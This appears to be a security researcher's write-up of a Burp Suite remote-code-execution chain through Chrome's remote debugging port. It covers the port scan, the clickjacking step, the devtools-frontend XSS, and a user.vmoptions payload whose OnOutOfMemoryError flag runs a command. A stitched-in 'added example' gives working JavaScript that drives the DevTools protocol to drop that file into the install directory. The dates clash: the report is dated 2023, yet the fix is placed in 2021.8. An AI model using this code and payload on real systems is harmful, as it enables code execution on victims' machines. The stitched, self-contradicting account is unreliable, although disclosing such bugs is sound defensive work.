
Burp Suite RCE via Chrome Remote Debugging

Burp Suite uses an embedded Chrome browser for crawling and scanning web applications. While investigating the security implications of this architecture, I found a critical vulnerability that lets an attacker achieve remote code execution on the victim’s machine by combining Chrome’s remote debugging interface with a long-public XSS vulnerability and a clickjacking attack. It is another exploitation case of the headless Chrome remote debugging RCE I discovered earlier (Chromium Issue 40084203).

The Vulnerability #

The vulnerability lies in how Burp Suite launches its embedded Chrome instance. Burp Suite runs Chrome in headless mode with remote debugging exposed over a WebSocket on a TCP port (--remote-debugging-port) rather than over the more secure pipe transport (--remote-debugging-pipe). That design choice, combined with an XSS vulnerability on chrome-devtools-frontend.appspot.com that has been public since at least 2016 (the full exploit chain is documented in Chromium Issue 40084203), creates a dangerous attack vector.

The attack chain works as follows:

  1. An attacker hosts a malicious webpage that port-scans localhost from JavaScript to find the randomized port on which Chrome’s remote debugging interface listens
  2. The same page uses clickjacking to trick the victim into clicking a button
  3. Once the port is known and the user has clicked, the attacker obtains the per-target GUID that forms the URL of the remote debugging WebSocket
  4. Using Chrome’s remote debugging APIs, the attacker triggers a file download into Burp Suite’s installation directory
  5. The downloaded file is a malicious user.vmoptions file containing JVM flags that exhaust the heap and run an OS command when that happens

The root cause is a combination of factors:

  • Burp Suite’s use of the WebSocket-based remote debugging transport instead of the more secure named pipe transport
  • Chrome’s known XSS vulnerability on chrome-devtools-frontend.appspot.com, which lets attacker-controlled JavaScript talk to the remote debugging interface (Chromium Issue 40084203)
  • The ability to write files into Burp Suite’s installation directory through the remote debugging APIs

Affected Versions #

  • Affected versions: Burp Suite Professional and Community prior to 2021.8
  • Patched versions: Burp Suite 2021.8 and later

If you are running an affected version, update to 2021.8 or later.

How It Works #

The attack scenario requires the victim to be running Burp Suite and scanning a web application:

  1. A user launches Burp Suite and starts a scan of a web application
  2. Burp Suite launches its embedded Chrome instance with remote debugging listening on a random localhost port
  3. The user (or Burp Suite’s crawler) navigates to a malicious webpage hosted by the attacker
  4. The malicious page port-scans localhost from JavaScript to identify the remote debugging port
  5. The page uses clickjacking to render a button that, when clicked, triggers the XSS vulnerability
  6. The exploit uses Chrome’s remote debugging APIs to download a malicious user.vmoptions file into /Applications/Burp Suite Professional.app/Contents/ (on macOS)
  7. The malicious file contains -Xmx5m (capping the JVM heap at 5 MB) and -XX:OnOutOfMemoryError=open -a Calculator (a command the JVM runs when it raises an OutOfMemoryError)
  8. When Burp Suite is restarted, it reads the malicious user.vmoptions file, exhausts the tiny heap almost immediately, and runs the attacker’s command

The proof of concept demonstrates this by opening the Calculator app, but an attacker could execute any arbitrary command with the same permissions as the user running Burp Suite.

Proof of Concept #

The proof of concept consists of a malicious HTML file (burp.html) that:

  1. Performs JavaScript port scanning to identify the Chrome remote debugging port
  2. Uses clickjacking to render an interactive button
  3. Exploits the XSS vulnerability to access Chrome’s remote debugging WebSocket
  4. Uses the remote debugging APIs to download the malicious user.vmoptions file

To reproduce the vulnerability:

  1. Download the exploit HTML file and host it on a web server:

    python -m http.server
    
  2. Launch Burp Suite and start a new scan of the web server

  3. Open a Chrome browser and navigate to the hosted exploit page (e.g., http://127.0.0.1:8000/burp.html)

  4. Observe the JavaScript port scanner identifying the randomized remote debugging port

  5. Click the “CLICK ME!!!” button when it appears

  6. Restart Burp Suite and observe that the Calculator app launches (or whatever command was specified in the exploit)
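The remote debugging part of the chain (steps 6 and 7 of “How It Works” and the download step of burp.html), as an added example that is not the post’s exploit file and not Burp Suite code. It assumes the attacker already holds the target’s WebSocket URL (the port scan, the chrome-devtools-frontend XSS and the clickjacking step that yield it are not reproduced), that the DevTools protocol methods Browser.setDownloadBehavior and Page.navigate are the calls used, and that the payload URL serves user.vmoptions with a Content-Disposition: attachment header so the navigation becomes a download. The install path, payload URL and FakeSocket are constructed so the file runs offline.

```javascript
// Added example (not the post's burp.html, not Burp Suite code): the CDP part
// of the chain, after the attacker already holds the target's WebSocket URL.
// Assumptions: Browser.setDownloadBehavior and Page.navigate are the CDP
// methods used; PAYLOAD_URL serves user.vmoptions as an attachment; the
// install path, the URL and FakeSocket are constructed for offline use.

const INSTALL_DIR = '/Applications/Burp Suite Professional.app/Contents';
const PAYLOAD_URL = 'http://127.0.0.1:8000/user.vmoptions';

// Body of the user.vmoptions payload the post describes, one JVM flag per line.
// The first flag makes the heap too small for Burp to start; the second names
// the command the JVM runs when the resulting OutOfMemoryError is raised.
function vmoptionsPayload(command) {
  return ['-Xmx5m', `-XX:OnOutOfMemoryError=${command}`].join('\n') + '\n';
}

// CDP commands: redirect downloads into downloadDir, then navigate to a URL
// whose response is served as an attachment, so Chrome writes it there.
function buildDownloadSequence(downloadDir, payloadUrl) {
  return [
    { id: 1, method: 'Browser.setDownloadBehavior',
      params: { behavior: 'allow', downloadPath: downloadDir } },
    { id: 2, method: 'Page.navigate', params: { url: payloadUrl } },
  ];
}

// Send one CDP command and resolve with its result. Replies carry the request
// id; events (Page.frameStartedLoading etc.) carry none and are skipped.
function sendAndWait(socket, message) {
  return new Promise((resolve, reject) => {
    socket.onmessage = (event) => {
      const reply = JSON.parse(event.data);
      if (reply.id !== message.id) return;
      socket.onmessage = null;
      if (reply.error) reject(new Error(`${message.method}: ${reply.error.message}`));
      else resolve(reply.result);
    };
    socket.send(JSON.stringify(message));
  });
}

// Run the commands in order. A failed setDownloadBehavior must abort before
// the navigation, otherwise the file lands in the default download folder.
async function runSequence(socket, messages) {
  const results = [];
  for (const message of messages) results.push(await sendAndWait(socket, message));
  return results;
}

// Constructed stand-in for a browser WebSocket: records what was sent and
// answers asynchronously, emitting an unsolicited event before each reply.
class FakeSocket {
  constructor() { this.sent = []; this.onmessage = null; }
  send(text) {
    const message = JSON.parse(text);
    this.sent.push(message);
    setTimeout(() => {
      if (!this.onmessage) return;
      this.onmessage({ data: JSON.stringify({ method: 'Page.frameStartedLoading', params: {} }) });
      this.onmessage({ data: JSON.stringify({ id: message.id, result: { frameId: 'F1' } }) });
    }, 0);
  }
}

// Against a live target, replace FakeSocket with `new WebSocket(wsUrl)` and
// call runSequence once its `onopen` fires.
const demoSocket = new FakeSocket();
runSequence(demoSocket, buildDownloadSequence(INSTALL_DIR, PAYLOAD_URL))
  .then(() => console.log('sent:', demoSocket.sent.map((m) => m.method).join(', ')));
```

The ordering matters: setDownloadBehavior must be acknowledged before the navigation, and the file name Chrome writes comes from the attachment header, so the server must name it user.vmoptions for Burp to pick it up on the next start.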

The Impact #

This vulnerability is particularly dangerous because:

  • Full system compromise: An attacker can execute arbitrary commands on the victim’s system with the same permissions as the user running Burp Suite
  • Persistent access: The malicious user.vmoptions file is read on every launch, so the command runs each time Burp Suite starts until the file is removed
  • Credential theft: An attacker could exfiltrate sensitive data, authentication tokens, or credentials stored on the system
  • Data exfiltration: An attacker could steal sensitive code, files, or other private data from the victim’s system

The attack is especially concerning because it targets security professionals who are using Burp Suite to test web applications. These users often have elevated permissions and access to sensitive systems, making them high-value targets.

Why This Is a Burp Suite Vulnerability #

According to Google’s security impact guidelines, the Chrome XSS vulnerability used in this attack would ordinarily be considered to have no security impact, because reaching it requires Chrome to be launched with extra flags (--remote-debugging-port and --headless) [1]. The root cause of this chain is documented in Chromium Issue 40084203 [2], which details how the XSS on chrome-devtools-frontend.appspot.com, combined with clickjacking, can be used to take over Chrome’s remote debugging interface. The XSS vector itself has been public since at least 2016 and was reported in several Chrome bug tickets [3-7].

However, this is a legitimate Burp Suite vulnerability because:

  • Burp Suite could have used the named pipe transport (--remote-debugging-pipe) instead of the WebSocket transport, which would have mitigated this issue
  • Tools like Puppeteer already support the more secure named pipe transport [8]
  • The vulnerability lies in Burp Suite’s design choices, not in Chrome itself

Disclosure and PortSwigger’s Response #

This vulnerability was reported to PortSwigger through their security program on October 10, 2023. PortSwigger’s security team responded promptly and shipped a fix in Burp Suite 2021.8 [9].

The Fix #

In Burp Suite 2021.8, PortSwigger hardened its handling of the Chrome remote debugging interface. The exact technical details of the fix have not been publicly disclosed; the approach I would recommend is to:

  • Use the named pipe transport (--remote-debugging-pipe) instead of the websocket transport where possible
  • Implement additional security controls around the remote debugging interface
  • Validate and sanitize any file operations performed through the remote debugging APIs

Users should update to Burp Suite 2021.8 or later to protect against this vulnerability.

Takeaways #

This vulnerability highlights several important security lessons:

  1. Defense in depth: Even when using components with known vulnerabilities, applications should implement additional security controls to mitigate potential exploitation

  2. Secure defaults: When multiple transport mechanisms are available (websocket vs. named pipe), choose the more secure option by default

  3. File system access: Applications should be cautious about allowing file system operations through debugging or remote interfaces, especially when those interfaces are accessible from untrusted sources

  4. Security tool security: Security professionals and the tools they use are high-value targets. These tools should be designed with security as a primary consideration, not an afterthought

The fact that this vulnerability affected a security testing tool used by security professionals serves as a reminder that no software is immune to vulnerabilities, and even tools designed to find security issues can themselves have security flaws.

References #

  1. Chrome Security Impact Guidelines
  2. Chromium Issue 40084203: Chrome Headless Remote Debugging RCE (root cause)
  3. Chromium Issue 607939
  4. Chromium Issue 618333
  5. Chromium Issue 619414
  6. Chromium Issue 775527
  7. Chromium Issue 798163
  8. Puppeteer PipeTransport implementation
  9. Burp Suite 2021.8 release notes